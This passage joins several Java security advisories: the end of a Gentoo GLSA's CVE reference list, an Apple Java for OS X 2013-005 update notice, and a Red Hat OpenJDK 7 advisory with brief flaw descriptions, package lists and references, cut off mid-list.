http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428\n[ 106 ] CVE-2013-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429\n[ 107 ] CVE-2013-0431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431\n[ 108 ] CVE-2013-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432\n[ 109 ] CVE-2013-0433\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433\n[ 110 ] CVE-2013-0434\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434\n[ 111 ] CVE-2013-0435\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435\n[ 112 ] CVE-2013-0440\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440\n[ 113 ] CVE-2013-0441\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441\n[ 114 ] CVE-2013-0442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442\n[ 115 ] CVE-2013-0443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443\n[ 116 ] CVE-2013-0444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444\n[ 117 ] CVE-2013-0450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450\n[ 118 ] CVE-2013-0809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809\n[ 119 ] CVE-2013-1475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475\n[ 120 ] CVE-2013-1476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476\n[ 121 ] CVE-2013-1478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478\n[ 122 ] CVE-2013-1480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480\n[ 123 ] CVE-2013-1484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484\n[ 124 ] CVE-2013-1485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485\n[ 125 ] CVE-2013-1486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486\n[ 126 ] CVE-2013-1488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488\n[ 127 ] CVE-2013-1493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493\n[ 128 ] CVE-2013-1500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500\n[ 129 ] CVE-2013-1518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518\n[ 130 ] CVE-2013-1537\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537\n[ 131 ] CVE-2013-1557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557\n[ 132 ] CVE-2013-1569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569\n[ 133 ] CVE-2013-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571\n[ 134 ] CVE-2013-2383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383\n[ 135 ] CVE-2013-2384\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384\n[ 136 ] CVE-2013-2407\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407\n[ 137 ] CVE-2013-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412\n[ 138 ] CVE-2013-2415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415\n[ 139 ] CVE-2013-2417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417\n[ 140 ] CVE-2013-2419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419\n[ 141 ] CVE-2013-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420\n[ 142 ] CVE-2013-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421\n[ 143 ] CVE-2013-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422\n[ 144 ] CVE-2013-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423\n[ 145 ] CVE-2013-2424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424\n[ 146 ] CVE-2013-2426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426\n[ 147 ] CVE-2013-2429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429\n[ 148 ] CVE-2013-2430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430\n[ 149 ] CVE-2013-2431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431\n[ 150 ] CVE-2013-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436\n[ 151 ] CVE-2013-2443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443\n[ 152 ] CVE-2013-2444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444\n[ 153 ] CVE-2013-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445\n[ 154 ] CVE-2013-2446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446\n[ 155 ] CVE-2013-2447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447\n[ 156 ] CVE-2013-2448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448\n[ 157 ] CVE-2013-2449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449\n[ 158 ] CVE-2013-2450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450\n[ 159 ] CVE-2013-2451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451\n[ 160 ] CVE-2013-2452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452\n[ 161 ] CVE-2013-2453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453\n[ 162 ] CVE-2013-2454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454\n[ 163 ] CVE-2013-2455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455\n[ 164 ] CVE-2013-2456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456\n[ 165 ] CVE-2013-2457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457\n[ 166 ] CVE-2013-2458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458\n[ 167 ] CVE-2013-2459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459\n[ 168 ] CVE-2013-2460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460\n[ 169 ] CVE-2013-2461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461\n[ 170 ] CVE-2013-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463\n[ 171 ] CVE-2013-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465\n[ 172 ] CVE-2013-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469\n[ 173 ] CVE-2013-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470\n[ 174 ] CVE-2013-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471\n[ 175 ] CVE-2013-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472\n[ 176 ] CVE-2013-2473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473\n[ 177 ] CVE-2013-3829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829\n[ 178 ] CVE-2013-4002\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002\n[ 179 ] CVE-2013-5772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772\n[ 180 ] CVE-2013-5774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774\n[ 181 ] CVE-2013-5778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778\n[ 182 ] CVE-2013-5780\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780\n[ 183 ] CVE-2013-5782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782\n[ 184 ] CVE-2013-5783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783\n[ 185 ] CVE-2013-5784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784\n[ 186 ] CVE-2013-5790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790\n[ 187 ] CVE-2013-5797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797\n[ 188 ] CVE-2013-5800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800\n[ 189 ] CVE-2013-5802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802\n[ 190 ] CVE-2013-5803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803\n[ 191 ] CVE-2013-5804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804\n[ 192 ] CVE-2013-5805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805\n[ 193 ] CVE-2013-5806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806\n[ 194 ] CVE-2013-5809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809\n[ 195 ] CVE-2013-5814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814\n[ 196 ] CVE-2013-5817\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817\n[ 197 ] CVE-2013-5820\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820\n[ 198 ] CVE-2013-5823\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823\n[ 199 ] CVE-2013-5825\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825\n[ 200 ] CVE-2013-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829\n[ 201 ] CVE-2013-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830\n[ 202 ] CVE-2013-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840\n[ 203 ] CVE-2013-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842\n[ 204 ] CVE-2013-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849\n[ 205 ] CVE-2013-5850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850\n[ 206 ] CVE-2013-5851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851\n[ 207 ] CVE-2013-6629\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629\n[ 208 ] CVE-2013-6954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954\n[ 209 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 210 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 211 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 212 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 213 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 214 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 215 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 216 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 217 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 218 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 219 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 220 ] CVE-2014-1876\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876\n[ 221 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 222 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 223 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 224 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 225 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 226 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 227 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 228 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201406-32.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2013-10-15-1 Java for OS X 2013-005 and\nMac OS X v10.6 Update 17\n\nJava for OS X 2013-005 and Mac OS X v10.6 Update 17 is now available\nand addresses the following:\n\nJava\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\nOS X Lion v10.7 or later, OS X Lion Server v10.7 or later,\nOS X Mountain Lion 10.8 or later\nImpact: Multiple vulnerabilities in Java 1.6.0_51\nDescription: 8011782 Multiple vulnerabilities existed in Java\n1.6.0_51, the most serious of which may allow an untrusted Java\napplet to execute arbitrary code outside the Java sandbox. These issues were addressed by updating to Java version\n1.6.0_65. Further information is available via the Java website at ht\ntp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html\nCVE-ID\nCVE-2013-3829\nCVE-2013-4002\nCVE-2013-5772\nCVE-2013-5774\nCVE-2013-5776\nCVE-2013-5778\nCVE-2013-5780\nCVE-2013-5782\nCVE-2013-5783\nCVE-2013-5784\nCVE-2013-5787\nCVE-2013-5789\nCVE-2013-5790\nCVE-2013-5797\nCVE-2013-5801\nCVE-2013-5802\nCVE-2013-5803\nCVE-2013-5804\nCVE-2013-5809\nCVE-2013-5812\nCVE-2013-5814\nCVE-2013-5817\nCVE-2013-5818\nCVE-2013-5819\nCVE-2013-5820\nCVE-2013-5823\nCVE-2013-5824\nCVE-2013-5825\nCVE-2013-5829\nCVE-2013-5830\nCVE-2013-5831\nCVE-2013-5832\nCVE-2013-5840\nCVE-2013-5842\nCVE-2013-5843\nCVE-2013-5848\nCVE-2013-5849\nCVE-2013-5850\n\n\nJava for OS X 2013-005 and Mac OS X v10.6 Update 17\nmay be obtained from the Software Update pane in System Preferences,\nMac App Store, or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nFor Mac OS X v10.6 systems\nThe download file is named: JavaForMacOSX10.6update17.dmg\nIts SHA-1 digest is: 5dfe7eaebf9726352c97964da61d57fa28246c08\n\nFor OS X Lion and Mountain Lion systems\nThe download file is named: JavaForOSX2013-005.dmg\nIts SHA-1 digest is: ce78f9a916b91ec408c933bd0bde5973ca8a2dc4\n\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.17 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJSXYc6AAoJEPefwLHPlZEwD8EP/3aN1h4wIM/BjidF3ZY+PXf3\nLzgtb8yAxh03A+J3NJCd3BKmjINXIo9Wwt9aUTktEz4UefvpF+rIsgKSinotvQt0\nTmtsYPItFgs83Lj2IFBpCLurM+O0fUhje+mvVzR/KA7kHvrtXYRC5w2plWh32Smm\nD4Ejh8odeR0IU3OdWV5MJpcRoRpRySX16JOEJc76SIE0+sbOLHZ90rmzyPMB0S2u\njZRq8qY3DJS9C5De97gh8F/V76fV8Aiq6RwGPs9m+tJUCJe6XLEy8Wq/G3jlKXyr\n+KrradRl9Bz5oTUnVDlN9odoOGZ/J4nq4xs0RyN08uETKcw6315+7UTP3B+hD8IM\n1YyWeceCd8oHtWlR/02spwaku5ctxiUZpqXQ8DxDH3e8dONBfndfmKGUnywQSFd8\nvCgZR0SQgSbhtD/UnNGW9VgJsxKgO4gi17aVD/B9LYmMztsSB+wPkg96uTR6J7yh\n+ogJqYeOGsMvvQd8XY++ig1bhEsfzzauEWnq3G4WG8E+Fep+5RHZewxnhzakapqW\n2z7byXHNXtIP2cxL//DG/x4ed+gAWzKxZyPDPSrltw162mkJk/6mTedtpead4LH8\nOoi4Cf1HMbC9gdRBdtGNWo7EN9kr9rpajuRWjqxT5uTLAgJusKk5UnSO2KJtromy\nLos4PbyC//yRidZKynqx\n=I3n5\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.7.0-openjdk security update\nAdvisory ID: RHSA-2013:1447-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-1447.html\nIssue date: 2013-10-21\nCVE Names: CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 \n CVE-2013-5774 CVE-2013-5778 CVE-2013-5780 \n CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 \n CVE-2013-5790 CVE-2013-5797 CVE-2013-5800 \n CVE-2013-5802 CVE-2013-5803 CVE-2013-5804 \n CVE-2013-5809 CVE-2013-5814 CVE-2013-5817 \n CVE-2013-5820 CVE-2013-5823 CVE-2013-5825 \n CVE-2013-5829 CVE-2013-5830 CVE-2013-5838 \n CVE-2013-5840 CVE-2013-5842 CVE-2013-5849 \n CVE-2013-5850 CVE-2013-5851 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-openjdk packages that fix various security issues are\nnow available for Red Hat Enterprise Linux 5. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\n\n3. Description:\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit. \n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine. \n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions. \n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. \nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n1018713 - CVE-2013-5803 OpenJDK: insufficient checks of KDC replies (JGSS, 8014341)\n1018717 - CVE-2013-5772 OpenJDK: insufficient html escaping in jhat (jhat, 8011081)\n1018720 - CVE-2013-5797 OpenJDK: insufficient escaping of window title string (Javadoc, 8016675)\n1018727 - CVE-2013-5784 OpenJDK: insufficient InterfaceImplementor security checks (Scripting, 8017299)\n1018736 - CVE-2013-5790 OpenJDK: insufficient security checks (Beans, 8012071)\n1018750 - CVE-2013-5849 OpenJDK: insufficient DataFlavor security checks (AWT, 8012277)\n1018755 - CVE-2013-5800 OpenJDK: default keytab path information leak (JGSS, 8022931)\n1018785 - CVE-2013-5780 OpenJDK: key data leak via toString() methods (Libraries, 8011071)\n1018831 - CVE-2013-5840 OpenJDK: getDeclaringClass() information leak (Libraries, 8014349)\n1018972 - CVE-2013-5820 OpenJDK: insufficient security checks (JAXWS, 8017505)\n1018977 - CVE-2013-5851 OpenJDK: XML stream factory finder information leak (JAXP, 8013502)\n1018984 - CVE-2013-5778 OpenJDK: image conversion out of bounds read (2D, 8014102)\n1019108 - CVE-2013-5782 OpenJDK: Incorrect awt_getPixelByte/awt_getPixelShort/awt_setPixelByte/awt_setPixelShort image raster checks (2D, 8014093)\n1019110 - CVE-2013-5830 OpenJDK: checkPackageAccess missing security check (Libraries, 8017291)\n1019113 - CVE-2013-5809 OpenJDK: JPEGImageReader and JPEGImageWriter missing band size checks (2D, 8013510)\n1019115 - CVE-2013-5829 OpenJDK: Java2d Disposer security bypass (2D, 8017287)\n1019117 - CVE-2013-5814 OpenJDK: RMIConnection stub missing permission check (CORBA, 8011157)\n1019118 - CVE-2013-5817 OpenJDK: VersionHelper12 does not honor modifyThreadGroup restriction (JNDI, 8013739)\n1019123 - CVE-2013-5842 OpenJDK: ObjectInputStream/ObjectOutputStream missing checks (Libraries, 8014987)\n1019127 - CVE-2013-5850 OpenJDK: Missing CORBA security checks (Libraries, 8017196)\n1019130 - CVE-2013-5802 OpenJDK: javax.xml.transform.TransformerFactory does not properly honor XMLConstants.FEATURE_SECURE_PROCESSING (JAXP, 8012425)\n1019131 - CVE-2013-5804 OpenJDK: javac does not ignore certain ignorable characters (Javadoc, 8016653)\n1019133 - CVE-2013-3829 OpenJDK: java.util.TimeZone does not restrict setting of default time zone (Libraries, 8001029)\n1019137 - CVE-2013-5783 OpenJDK: JTable not properly performing certain access checks (Swing, 8013744)\n1019139 - CVE-2013-5825 OpenJDK: XML parsing Denial of Service (JAXP, 8014530)\n1019145 - CVE-2013-5823 OpenJDK: com.sun.org.apache.xml.internal.security.utils.UnsyncByteArrayOutputStream Denial of Service (Security, 8021290)\n1019147 - CVE-2013-5774 OpenJDK: Inet6Address class IPv6 address processing errors (Libraries, 8015743)\n1019176 - CVE-2013-4002 OpenJDK: XML parsing Denial of Service (JAXP, 8017298)\n1019300 - CVE-2013-5838 OpenJDK: Vulnerability in Libraries component (Libraries, 7023639)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.i386.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.i386.rpm\njava-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.i386.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-3829.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4002.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5772.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5774.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5778.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5780.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5782.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5783.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5784.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5790.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5797.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5800.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5802.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5803.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5804.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5809.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5814.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5817.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5820.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5823.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5825.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5829.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5830.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5838.html\nhttps://www.redhat.com/security/da